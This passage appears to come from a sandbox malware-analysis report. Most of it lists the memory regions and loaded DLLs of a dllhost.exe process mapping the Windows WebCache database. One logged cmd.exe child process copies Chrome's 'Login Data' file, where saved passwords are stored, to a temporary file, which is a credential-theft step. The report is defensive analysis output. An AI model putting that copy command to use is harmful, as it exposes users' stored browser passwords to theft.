"\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17655 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17656 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17657 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17658 start_va = 0xa10000 end_va = 0xa17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 17659 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17660 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17661 start_va = 0xa40000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17662 start_va = 0xa50000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17663 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17664 start_va = 0xa80000 end_va = 0xb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 17665 start_va = 0xb80000 end_va = 0xd07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 17666 start_va = 0xd10000 end_va = 0xe90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 17667 start_va = 0xea0000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 17668 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 17669 start_va = 0x23a0000 end_va = 0x23a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 17670 start_va = 0x23b0000 end_va = 0x23b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 17671 start_va = 0x23d0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 17672 start_va = 0x24e0000 end_va = 0x2816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 17673 start_va = 0x2820000 end_va = 0x282ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 17674 start_va = 0x2830000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 17675 start_va = 0x2840000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 17676 start_va = 0x2850000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002850000" filename = "" Region: id = 17677 start_va = 0x2860000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 17678 start_va = 0x2870000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 17679 start_va = 0x2880000 end_va = 0x387ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 17680 start_va = 0x3880000 end_va = 0x390ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 17681 start_va = 0x3910000 end_va = 0x3a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 17682 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17683 start_va = 0x3a50000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 17684 start_va = 0x3b90000 end_va = 0x3b9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17685 start_va = 0x3bd0000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17686 start_va = 0x3be0000 end_va = 0x3beffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17687 start_va = 0x3bf0000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17688 start_va = 0x3c00000 end_va = 0x3c07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 17689 start_va = 0x3c10000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17690 start_va = 0x3c20000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17691 start_va = 0x3c30000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17692 start_va = 0x3c40000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17693 start_va = 0x3c50000 end_va = 0x3c57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 17694 start_va = 0x3c60000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17695 start_va = 0x3c70000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17696 start_va = 0x3c80000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c80000" filename = "" Region: id = 17697 start_va = 0x3d10000 end_va = 0x3d1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d10000" filename = "" Region: id = 17698 start_va = 0x3d30000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17699 start_va = 0x3d40000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17700 start_va = 0x3d60000 end_va = 0x3d6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17701 start_va = 0x3d70000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17702 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 17703 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 17704 start_va = 0x3f80000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 17705 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17706 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 17707 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 17708 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 17709 start_va = 0x7ff76b7b0000 end_va = 0x7ff76b7b6fff monitored = 0 entry_point = 0x7ff76b7b1570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 17710 start_va = 0x7ffb4d740000 end_va = 0x7ffb4d754fff monitored = 0 entry_point = 0x7ffb4d745740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 17711 start_va = 0x7ffb52740000 end_va = 0x7ffb529cdfff monitored = 0 entry_point = 0x7ffb52810f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 17712 start_va = 0x7ffb52d10000 end_va = 0x7ffb53008fff monitored = 0 entry_point = 0x7ffb52dd7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 17713 start_va = 0x7ffb58ad0000 end_va = 0x7ffb58e51fff monitored = 0 entry_point = 0x7ffb58b21220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 17714 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 17715 start_va = 0x7ffb5d760000 end_va = 0x7ffb5d790fff monitored = 0 entry_point = 0x7ffb5d767d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 17716 start_va = 0x7ffb5d9d0000 end_va = 0x7ffb5d9eefff monitored = 0 entry_point = 0x7ffb5d9d5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 17717 start_va = 0x7ffb5dd10000 end_va = 0x7ffb5dd1afff monitored = 0 entry_point = 0x7ffb5dd119a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 17718 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 17719 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 17720 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 17721 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 17722 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 17723 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 17724 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 17725 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17726 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 17727 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 17728 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17729 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17730 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17731 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17732 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17733 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17734 start_va = 0x7ffb615e0000 end_va = 0x7ffb61686fff monitored = 0 entry_point = 0x7ffb615eb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 17735 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17736 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 17737 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 17738 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17739 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17772 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 17773 start_va = 0x4080000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 17774 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 18123 start_va = 0x940000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 18124 start_va = 0x23c0000 end_va = 0x23c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 18222 start_va = 0x940000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 18391 start_va = 0x23c0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Thread: id = 100 os_tid = 0xee4 Thread: id = 101 os_tid = 0xcc4 Thread: id = 102 os_tid = 0x614 Thread: id = 103 os_tid = 0x8d8 Thread: id = 104 os_tid = 0x8c8 Thread: id = 105 os_tid = 0x8bc Thread: id = 106 os_tid = 0x8b4 Thread: id = 108 os_tid = 0xe20 Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2e22000" os_pid = "0xd60" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf98" cmd_line = "/c copy \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\" \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1\" /V" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17776 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17777 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 17778 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17779 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 17780 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 17781 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 17782 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17783 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 17784 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 17785 start_va = 0xd20000 end_va = 0xd71fff monitored = 1 entry_point = 0xd34fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 17786 start_va = 0xd80000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 17787 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 17788 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17789 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17790 start_va = 0x7fff0000 end_va = 0x7dfb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 17791 start_va = 0x7dfb61c50000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb61c50000" filename = "" Region: id = 17792 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17793 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 17794 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 17795 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 17796 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 17797 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 17798 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: 